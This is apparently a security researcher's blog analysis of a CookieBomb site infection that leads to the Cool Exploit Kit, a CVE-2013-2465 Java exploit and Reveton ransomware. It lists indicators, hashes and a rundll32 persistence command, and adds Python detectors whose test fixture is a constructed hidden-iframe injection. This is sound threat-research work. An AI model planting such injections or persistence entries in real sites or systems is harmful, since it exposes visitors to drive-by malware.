Active CookieBomb, CVE 2013-2465 and Reveton

This is the second QuickAnalysis post, after the one by evilcry.
During my daily urlquery investigation (, I came across a website infected by the CookieBomb injection payload.


The JS inside the index page, obviously, is obfuscated:


After deobfuscation we have this:


The code above clearly shows a classic CookieBomb JavaScript infection. What is it? In short: first it checks whether a marker cookie is present; if the cookie matches, no action is taken, otherwise it sets the cookie and builds an iframe pointing to the landing page.
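The pattern just described (cookie check, cookie write, hidden iframe to a landing page) is mechanical enough to be hunted for in page source. The scanner below is an added example, not code from the original post: it pulls inline script blocks out of an HTML document, looks for the three CookieBomb building blocks plus the usual hide-the-iframe styling, and reports the landing URL when it can find it. The HTML it runs on is constructed for the example; the "hxxp://landing.invalid/..." URL and the cookie name are placeholders, and the consent-banner script is included only to show that a benign cookie check alone does not trigger a hit.

```python
import re
from dataclasses import dataclass
from typing import List

# Non-greedy match over inline <script> bodies (DOTALL so scripts may span lines).
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Each indicator is one building block of the CookieBomb pattern described in the post.
INDICATORS = {
    "cookie_check": re.compile(r"document\.cookie\s*\.\s*(?:indexOf|match|search)\s*\(", re.I),
    "cookie_write": re.compile(r"document\.cookie\s*=", re.I),
    "iframe": re.compile(r"createElement\s*\(\s*['\"]iframe['\"]\s*\)|<iframe\b", re.I),
    "hidden": re.compile(
        r"display\s*[:=]\s*['\"]?none|visibility\s*[:=]\s*['\"]?hidden"
        r"|(?:width|height)\s*[:=]\s*['\"]?[01]\b", re.I),
    "obfuscation": re.compile(r"String\.fromCharCode|unescape\s*\(|eval\s*\(", re.I),
}

# Where an iframe src is assigned; used only to extract the landing page for the report.
SRC_RE = re.compile(
    r"(?:\.src\s*=|setAttribute\s*\(\s*['\"]src['\"]\s*,)\s*['\"]([^'\"]+)['\"]", re.I)


@dataclass
class Finding:
    index: int          # position of the <script> block in the page
    hits: List[str]     # indicator names that matched
    verdict: str        # "cookiebomb", "suspicious" or "clean"
    landing: str        # extracted iframe src, if any


def scan_html(html: str) -> List[Finding]:
    """Classify every inline script block in `html`."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html)):
        body = m.group(1)
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        # The core CookieBomb triad: check a cookie, set it, inject an iframe.
        core = {"cookie_check", "cookie_write", "iframe"} <= set(hits)
        if core and "hidden" in hits:
            verdict = "cookiebomb"
        elif core:
            verdict = "suspicious"
        else:
            verdict = "clean"
        src = SRC_RE.search(body)
        findings.append(Finding(i, hits, verdict, src.group(1) if src else ""))
    return findings


# Constructed sample page: one benign cookie script, one CookieBomb-style injection.
SAMPLE_HTML = """<html><head>
<script>
// benign consent banner (constructed): reads and writes a cookie, injects nothing
if (document.cookie.indexOf("consent=") == -1) { document.cookie = "consent=1; path=/"; }
</script>
</head><body>
<p>hello</p>
<script>
// constructed CookieBomb-style block: marker cookie, then a hidden iframe to the landing page
if (document.cookie.indexOf("q2w3=") == -1) {
  document.cookie = "q2w3=1; path=/";
  var f = document.createElement("iframe");
  f.setAttribute("src", "hxxp://landing.invalid/images/esd.php");
  f.style.display = "none";
  document.body.appendChild(f);
}
</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"script #{f.index}: {f.verdict:10s} hits={f.hits} landing={f.landing or '-'}")
```

The benign block is reported as clean because it never creates an iframe; the injected block is reported as cookiebomb with its landing URL, which is the value worth feeding into the next step of the analysis (the curl probe of the landing page).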

What interests us is the landing page, in this case:


Luckily, I managed to catch it while it was active and redirecting the victim to an infected page:

$ curl --config ~/.curlrc1 -v
* Adding handle: conn: 0xc595e0
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0xc595e0) send_pipe: 1, recv_pipe: 0
* About to connect() to port 80 (#0)
*   Trying
* Connected to ( port 80 (#0)
> GET /images/esd.php HTTP/1.1
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
> Host:
> Referer:
> Accept:text/html, application/xhtml+xml, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> Connection: Keep-Alive
< HTTP/1.1 302 Found
< Date: Wed, 11 Sep 2013 07:20:35 GMT
* Server Apache/2.4.4 (Unix) mod_fcgid/2.3.7 is not blacklisted
< Server: Apache/2.4.4 (Unix) mod_fcgid/2.3.7
< X-Powered-By: PHP/5.3.27
< Location:
< Content-Length: 0
< Keep-Alive: timeout=5, max=100
< Connection: Keep-Alive
< Content-Type: text/html
* Connection #0 to host left intact

Let me first explain the curl command. I passed two arguments:

-v, --verbose       Make the operation more talkative
--config FILE       Specify which config file to read; below is the .curlrc1 file:

header = "Accept:text/html, application/xhtml+xml, */*"
header = "Accept-Language: en-us"
header = "Accept-Encoding: gzip, deflate"
header = "Connection: Keep-Alive"

user-agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
referer = ""

Returning to the analysis: as we can see, there is another redirect, this time to the "ExploitKit", which in this case is CoolEK (in the final notes I will explain the reason for this conclusion).


$ wget
--2013-09-11 09:20:05--
Risoluzione di (
Connessione a (||:1024... connesso.
Richiesta HTTP inviata, in attesa di risposta... 200 OK
Lunghezza: non specificato 
Salvataggio in: "selfish-bright_privacy-wooden.php"

    [ <=>                                                                                  ] 3.673       --.-K/s   in 0s      

2013-09-11 09:20:05 (179 MB/s) - "selfish-bright_privacy-wooden.php" salvato [3673]

Let’s see the content: (I’ve removed the parts with the comments)


What does it do? First, "innocent-absurd_obey.js" ( is the JS devoted to fingerprinting the browser and its installed plugins. Why? Because this "ExploitKit" drops, among other things, an exploit for CVE-2013-2465.

CVE-2013-2465 hxxp://

SHA256: 699edfd71ddd15316904b1d2c1077bd6d4b87defda358a2a12147a31073295a5
SHA1: ada48487433324ebd891c99aeaa967f7328f0de3
MD5: 066f992f5cf7df156860893bb6ee7ed7
File size: 111.3 KB ( 113926 bytes )
File name: lay_hostage.jar
File type: ZIP
Detection ratio: 4 / 46
Analysis date: 2013-09-11 07:39:10 UTC


Reveton hxxp://
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

SHA256: 639b9668ebaa695adec65f878721051b9fbfef2dbc18b0d2ec1acbff4f67400b
SHA1: bccbaa3c8081da59eefbed58250d179204ce5994
MD5: 7c48c2acf32bf88deabf959ff9ce9532
File size: 88.5 KB ( 90624 bytes )
File name: 7c48c2acf32bf88deabf959ff9ce9532
File type: Win32 DLL
Detection ratio: 18 / 46
Analysis date: 2013-09-11 07:24:34 UTC

During the investigation, the landing page hxxp:// returned other domains infected with the same files (the JS and the dropped binaries).


The activation timing follows no obvious logic; when the redirect is not active, the landing page simply returns "ok":

HTTP/1.1 200 OK
Date: Wed, 11 Sep 2013 15:26:24 GMT
* Server Apache/2.4.4 (Unix) mod_fcgid/2.3.7 is not blacklisted
Server: Apache/2.4.4 (Unix) mod_fcgid/2.3.7
X-Powered-By: PHP/5.3.27
Content-Length: 2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

* Connection #0 to host left intact
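When a landing page has to be re-probed repeatedly to catch its active window, it helps to parse the curl output instead of reading it by eye. The triage helper below is an added example, not part of the original post: it takes a curl -v transcript in the format shown above (with or without the "< " prefix on response headers, since both forms appear in this post), extracts the request line, the status code and the response headers, and classifies the probe as an active redirect (with the Location it points to, noting port 1024 because of the CoolEK observation made later in the post) or as the inactive two-byte "ok" answer. The two transcripts embedded in the code are constructed from the ones above: the hosts "landing.invalid" and "ek.invalid" and the IP 203.0.113.10 are placeholders, not the real infrastructure.

```python
import re
from dataclasses import dataclass, field
from typing import Dict

STATUS_RE = re.compile(r"^HTTP/\d\.\d\s+(\d{3})\b")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")
# Scheme://host:port prefix of a Location value; "hxxp" defanged URLs match too.
PORT_RE = re.compile(r"^[a-z]+://[^/:]+:(\d+)", re.I)


@dataclass
class Probe:
    request: str = ""                       # e.g. "GET /images/esd.php HTTP/1.1"
    status: int = 0
    headers: Dict[str, str] = field(default_factory=dict)   # lower-cased names
    verdict: str = "unknown"
    next_hop: str = ""                      # Location header, if any


def parse_curl_trace(text: str) -> Probe:
    """Extract request line, status and headers from a curl -v transcript."""
    p = Probe()
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("* "):           # curl's own chatter, not protocol data
            continue
        if line.startswith("> "):           # request side: keep the first request line
            if not p.request and line[2:].split(" ")[0] in ("GET", "POST", "HEAD"):
                p.request = line[2:]
            continue
        if line.startswith("< "):           # response side, verbose style
            line = line[2:]
        m = STATUS_RE.match(line)
        if m:
            p.status = int(m.group(1))
            continue
        m = HEADER_RE.match(line)
        if m and p.status:                  # only collect headers after the status line
            p.headers[m.group(1).lower()] = m.group(2)
    return p


def triage(text: str) -> Probe:
    """Classify a landing-page probe as active redirect, inactive 'ok', or unknown."""
    p = parse_curl_trace(text)
    loc = p.headers.get("location", "")
    if p.status in (301, 302, 303, 307, 308) and loc:
        p.next_hop = loc
        p.verdict = "active-redirect"
        port = PORT_RE.match(loc)
        if port and port.group(1) == "1024":   # the CoolEK port noted in the post
            p.verdict += "-port1024"
    elif p.status == 200 and p.headers.get("content-length") == "2":
        p.verdict = "inactive-ok"           # the 2-byte "ok" body seen when dormant
    return p


# Constructed transcripts modelled on the two probes shown in the post.
ACTIVE_TRACE = """\
* Connected to landing.invalid (203.0.113.10) port 80 (#0)
> GET /images/esd.php HTTP/1.1
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
> Host: landing.invalid
> Accept:text/html, application/xhtml+xml, */*
< HTTP/1.1 302 Found
< Date: Wed, 11 Sep 2013 07:20:35 GMT
* Server Apache/2.4.4 (Unix) mod_fcgid/2.3.7 is not blacklisted
< Server: Apache/2.4.4 (Unix) mod_fcgid/2.3.7
< X-Powered-By: PHP/5.3.27
< Location: hxxp://ek.invalid:1024/selfish-bright_privacy-wooden.php
< Content-Length: 0
< Content-Type: text/html
* Connection #0 to host left intact
"""

INACTIVE_TRACE = """\
> GET /images/esd.php HTTP/1.1
> Host: landing.invalid
HTTP/1.1 200 OK
Date: Wed, 11 Sep 2013 15:26:24 GMT
Server: Apache/2.4.4 (Unix) mod_fcgid/2.3.7
X-Powered-By: PHP/5.3.27
Content-Length: 2
Connection: Keep-Alive
Content-Type: text/html

ok
* Connection #0 to host left intact
"""

if __name__ == "__main__":
    for name, trace in (("active", ACTIVE_TRACE), ("inactive", INACTIVE_TRACE)):
        p = triage(trace)
        print(f"{name}: {p.request} -> {p.status} {p.verdict} {p.next_hop}")
```

Feeding it the saved output of the curl command with the .curlrc1 config from earlier in the post (the IE9 user agent and headers are what make the server answer at all) gives a one-line verdict per probe, which is convenient when polling the landing page over a period of time.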

At the end of the post I include some intelligence gathered on the domains connected to the various active IPs.

Why do I think the ExploitKit involved is CoolEK? Two main reasons:

First: while I was working on the IP intelligence, the same IPs turned out to be infected with CoolEK:

Second: a tweet from @Set Abominae, "Cool Exploit Kit has now started to use port 1024", which is exactly our port.


A Brief Analysis of Reveton

After I injected the DLL into an active process, rundll32.exe was launched with the DLL path and the export GL300


which is the export needed to start the fake page:


and a .lnk file was dropped in the Startup folder:

C:\WINDOWS\system32\rundll32.exe C:\DOCUME~1\ALLUSE~1\DATIAP~1\q39w8z8.plz,GL300

Once the injection and the malware routine are completed, the system reboots and the fake page is spawned.
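The persistence artifact above (a Startup-folder .lnk whose target is rundll32.exe loading a module with a non-DLL extension from the All Users application-data folder, by export name) is a good hunting signature. The script below is an added example, not code from the original post: it parses rundll32 command lines as you would collect them from Startup .lnk targets or process-creation logs, and scores each on three indicators: module extension not one rundll32 normally loads, module located in a user-writable or application-data path, and an 8.3 short path (the "~1" form seen in the post). The sample list reuses the command line from the post; the other entries are constructed, and the assumption that "DATIAP~1" is the short name of an Italian-locale "Dati applicazioni" (Application Data) folder is noted in the code.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# "<path\>rundll32[.exe] <module>,<export>", with the module optionally quoted.
RUNDLL_RE = re.compile(
    r'^"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+("[^"]+"|[^\s,]+)\s*,\s*(\S+)', re.I)

# Extensions rundll32 is routinely asked to load by legitimate software.
ALLOWED_EXT = {".dll", ".cpl", ".ocx", ".ax", ".drv"}

# Substrings (lower-cased) that place the module in a user-writable or app-data location.
# "datiap~1" is assumed to be the 8.3 short name of "Dati applicazioni", the Italian
# Application Data folder, matching the path in the post.
WRITABLE_HINTS = (
    "\\temp\\", "\\appdata\\", "\\application data\\", "\\dati applicazioni\\",
    "\\programdata\\", "\\users\\public\\", "\\local settings\\", "\\startup\\",
    "datiap~1", "applic~1",
)


@dataclass
class RunDllFinding:
    command: str
    module: str
    export: str
    indicators: List[str]
    verdict: str   # "high" (2+ indicators), "medium" (1) or "low" (0)


def inspect_command(cmd: str) -> Optional[RunDllFinding]:
    """Return a finding for a rundll32 command line, or None if it is not one."""
    m = RUNDLL_RE.match(cmd.strip())
    if not m:
        return None
    module = m.group(1).strip('"')
    export = m.group(2)
    low = module.lower()
    indicators = []
    if ntpath.splitext(low)[1] not in ALLOWED_EXT:
        indicators.append("non-dll-extension")      # e.g. the ".plz" module in the post
    if any(hint in low for hint in WRITABLE_HINTS):
        indicators.append("user-writable-path")
    if re.search(r"~\d", low):
        indicators.append("short-83-path")          # DOCUME~1 style paths
    verdict = "high" if len(indicators) >= 2 else "medium" if indicators else "low"
    return RunDllFinding(cmd, module, export, indicators, verdict)


def scan_commands(cmds: List[str]) -> List[RunDllFinding]:
    """Inspect a batch of command lines, keeping only rundll32 invocations."""
    return [f for f in map(inspect_command, cmds) if f is not None]


SAMPLE_COMMANDS = [
    # The Startup-folder .lnk target observed in the post.
    r"C:\WINDOWS\system32\rundll32.exe C:\DOCUME~1\ALLUSE~1\DATIAP~1\q39w8z8.plz,GL300",
    # Constructed entries: a system DLL by name, a suspicious AppData module, a non-rundll32 line.
    r"C:\WINDOWS\system32\rundll32.exe shell32.dll,Control_RunDLL",
    r'"C:\Windows\System32\rundll32.exe" "C:\Users\bob\AppData\Roaming\x1y2z3.tmp",Run',
    r"C:\WINDOWS\explorer.exe",
]

if __name__ == "__main__":
    for f in scan_commands(SAMPLE_COMMANDS):
        print(f"[{f.verdict:6s}] {f.module},{f.export}  {', '.join(f.indicators) or '-'}")
```

On a live system the command lines would come from the targets of .lnk files in the per-user and All Users Startup folders and from process-creation events for rundll32.exe; the scoring deliberately does not depend on the export name, since "GL300" is specific to this sample while the extension and path indicators generalize.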

In the Windows reference we read:
In the wild, we have observed variants of Trojan:Win32/Reveton downloading these DLL files, images and other bundled malware from the following IP addresses, using port 80 or 443

In our case the IP is:, ASN: AS44050 Petersburg Internet Network LLC, Location: Russian Federation

Thanks for reading this QuickAnalysis; below is some information that might come in handy:

MD5s of the CVE jar's contents:

2ca3e48ea629d2fea1d3c6ac30d10799  Addoo.class
e9583b7a40c437dfd83339e351c037e2  Addoo2.class
c955e3c3f937bae06e96e4fae0c74237  Tt.class
d3b529285108d94bbac72137db10c538  buslctvhfuryr.class
1f234c8535d2f2f61b51d76b56520f15  ekegauvfvcglbt.class
55289a5cfd9ad4b0aa0a83c98671da7e  gvcjmhuabewgvmujaekhcedh.class
02196f032a92070ed5258a60ad319914  jfdhrdvduvrefldtcrrdf.class
cf6507664c87121e4b3134df4fb87e5c  mawwdeel.class
caddda6c0d31adc48ccbccfb7401452d  mmwbu.class
f3e1702d0310c5f36e31e01ba98e9fb3  pfagw.class
b48ad335e80b07b978169a44637cf567  pyscedwc.class
62a1621ffb280767afa94b9edb009280  qeajcusrdwlncdbwbdc.class
ba46dc2c0bfa8aad769508c1b40e1775  qjutgmqhtuypfjlmdspdbj.class
880b4901826059273dc34f936d8b2377  sqhwrqsyglemtgpacldkmuvbl.class
54ed4794cdc97dc19f5593d5e328b209  vbvqteemwnt.class
eab069c38b8fc5499cbdf91f7b901a99  vcsemrgtm.class

PS: eacc41f1eb26f57b227a79b987a41991.deb is a file inside the CVE's .jar; after reading Kafeine's link, it may be Urausy or Reveton XORed. I haven't checked yet.

All files are placed in the zip file (password: infected):



CVE 2013-2465:

CookieBomb :



  1. hxxp://
    is now serving 8f78b1665fd080ffc149f0ec7ec694cb (DLL) with 0/46 on VirusTotal:

  2. Still active: Location: hxxp://

    Reveton: hxxp://\?e\=21

    SHA256: 5d8d47632c936df4cb3ef15ac39b74fbaea6db61833234a9172e92fbef37115c
    SHA1: 3e012b420d308e72a2df2edb91b9e02f610462bd
    MD5: 6d394232f16fe38f3225ef77270559ae
    File size: 187.9 KB ( 192410 bytes )
    File name: spider-birthday.txt?e=21
    File type: Win32 DLL
    Detection ratio: 1 / 48
    Analysis date: 2013-09-19 16:13:23 UTC

    CVE-2013-2465: hxxp://
    SHA256: c4f563c71d90ea21c0076549572ff3f28d74fee2195934ec11ad1b55fd5e2508
    SHA1: fe65df871d4f56a9389ab30c5819c4874c008b73
    MD5: 2043f8854cd5613abd136323252203e5
    File size: 32.9 KB ( 33664 bytes )
    File name: rectangle-bus_constant.jar
    Detection ratio: 8 / 48
    Analysis date: 2013-09-19 16:13:39 UTC

  3. Still active: hxxp://

    Reveton: hxxp://

    SHA256: e21345f8dcc271db9322a2d94a8fc261bd27f8e238a14cac18fcc599caf1543d
    SHA1: e501e5d9833187cf804b0b360ea8b43291327f18
    MD5: 6b72314693b4aeca1ec7a09153bd248e
    File size: 100.0 KB ( 102400 bytes )
    File name: without_found_remedy_learn.txt?e=21
    Detection ratio: 4 / 48
    Analysis date: 2013-09-26 06:45:48 UTC

    CVE-2013-2465: hxxp://

    SHA256: eb71f795515a3da20774fa4e1d949073e1d4347a5475f0b36a6f9d6869d2c1c7
    SHA1: c27a8fecad440488d430ee11724e7024c8371dd3
    MD5: e419739e96913eb6e2b6793f7dd11a7b
    File size: 33.0 KB ( 33826 bytes )
    File name: release_successor-therefore-solitary.jar
    Detection ratio: 4 / 48
    Analysis date: 2013-09-26 06:47:17 UTC